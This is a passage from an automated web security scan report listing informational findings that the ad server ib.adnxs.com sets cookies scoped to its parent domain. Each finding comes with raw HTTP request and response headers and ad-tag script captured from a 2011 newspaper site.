Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:27:12 GMT
Content-Length: 834

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-51832465_1296253632,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.69. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
acb307194=5_[r^208WMM2x@N!@@-#i?ZLM?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP-_d-QzLH-9yBWHfHSmrEEKVcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpQQBAgUCAAIAAAAALyTsvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265365%29%3Buf%28%27r%27%2C+116344%2C+1296265365%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.70. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
acb309158=5_[r^208WMM2x@N!@@-#d2Qg=?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP6x8iUTubwtkBWHfHSmrEEKFcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAsSLfRQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265349%29%3Buf%28%27r%27%2C+116344%2C+1296265349%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.71. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
acb322141=5_[r^208WMZzhw!0nf8M'VILZ?enc=AAAAAAAA4D_NzMzMzMzcPwAAAKCZmQFAzczMzMzM3D8AAAAAAADgP8QzzGlufgMIBWHfHSmrEELSQENNAAAAACQ9AwA3AQAAbAEAAAIAAACDbAIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AUBAgUCAAIAAAAAUCD5SgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+8044%2C+1296253138%29%3Buf%28%27c%27%2C+43438%2C+1296253138%29%3Buf%28%27g%27%2C+18638%2C+1296253138%29%3Buf%28%27r%27%2C+158851%2C+1296253138%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3B&cnd=!wRdxQwiu0wIQg9kJGAAg_70BKNQJMQAAAAAAAOA_QhMIABAAGAAgASj-__________8BQgsIpEIQABgAIAMoAUILCKRCEAAYACACKAFIAVAAWKoDYABo7AI.; path=/; expires=Sat, 29-Jan-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb458625=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb322141=5_[r^208WMZzhw!0nf8M'VILZ?enc=AAAAAAAA4D_NzMzMzMzcPwAAAKCZmQFAzczMzMzM3D8AAAAAAADgP8QzzGlufgMIBWHfHSmrEELSQENNAAAAACQ9AwA3AQAAbAEAAAIAAACDbAIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AUBAgUCAAIAAAAAUCD5SgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+8044%2C+1296253138%29%3Buf%28%27c%27%2C+43438%2C+1296253138%29%3Buf%28%27g%27%2C+18638%2C+1296253138%29%3Buf%28%27r%27%2C+158851%2C+1296253138%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3B&cnd=!wRdxQwiu0wIQg9kJGAAg_70BKNQJMQAAAAAAAOA_QhMIABAAGAAgASj-__________8BQgsIpEIQABgAIAMoAUILCKRCEAAYACACKAFIAVAAWKoDYABo7AI.; path=/; expires=Sat, 29-Jan-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:18:58 GMT
Content-Length: 833

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-84139438_1296253138,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.72. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
acb855999=5_[r^208WMM2x@N!@@-#bq9B8?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP8bZnQsCO006BWHfHSmrEEKBcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEIwkBAgUCAAIAAAAAjSFWAgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265345%29%3Buf%28%27r%27%2C+116344%2C+1296265345%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.73. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
acb725885=5_[r^208WMM2x@N!@@-#43LyA?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP5TFsK1Hqr8OBWHfHSmrEEL2WENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA_gYBAgUCAAUAAAAAwyMSswAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296259318%29%3Buf%28%27r%27%2C+116344%2C+1296259318%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-31727353_1296259318%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D604786%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v

Response

10.74. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 23:00:16 GMT
Content-Length: 826

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonherald/;net=cm;u=,cm-59440650_1296255616,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.75. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
acb506874=5_[r^208WMM2x@N!@@-#aWxt4?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP9q3wM3c37k8BWHfHSmrEEJ9cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgUBAgUCAAIAAAAAtyQC8QAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265341%29%3Buf%28%27r%27%2C+116344%2C+1296265341%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5Q%JvH4xDy_Pa]7S).d*U`>Ok$)gcuXD-L66R1@O4vp]ccG_H+%(u%mQtz*[d<.HEQ2b+)89LT/'^G@=+00].ps-rcmC0]*`Bb^`#V*AM6Ne*R5L=aW-ObhHV=.^C5BoO'uuJk8/]y:]wAdA6qeH?q7qFudKnD[)aHje%=uq$/OH'(wercy6M%TG:^q9-lPoF(K[-HVk; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly

